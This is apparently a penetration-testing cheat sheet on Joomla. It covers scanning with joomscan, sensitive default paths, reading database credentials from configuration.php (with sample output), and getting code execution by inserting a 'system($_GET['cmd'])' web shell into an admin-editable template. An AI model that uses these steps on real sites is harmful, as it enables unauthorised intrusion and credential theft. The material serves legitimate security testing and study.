Joomla
What it is: Popular open-source CMS, third most used after WordPress and Drupal. Extensions and components are the main attack surface. Admin panel at /administrator/.
Default ports: 80, 443
Vuln research:
Enumerate Joomla
Version, components, and configuration files — Use joomscan
joomscan -u http://$IP/
curl -s http://$IP/administrator/manifests/files/joomla.xml | grep version
Joomla default paths
Key files and directories — Check all of these
/administrator/ # Admin login
/configuration.php # DB creds (if readable)
/README.txt # Version info
/robots.txt # Hidden paths
RCE via Template Editing
Edit a template PHP file — Requires admin access
# Extensions → Templates → Templates → Protostar → index.php
# Add: system($_GET['cmd']);
# Visit: http://$IP/index.php?cmd=id
Joomla configuration.php
Contains database credentials — Check for password reuse
cat /var/www/html/configuration.php | grep -E "(user|password|host|db)"
Example Output
public $user = 'joomla_admin';
public $password = 'J00mla_Sup3r!';
public $db = 'joomla_db';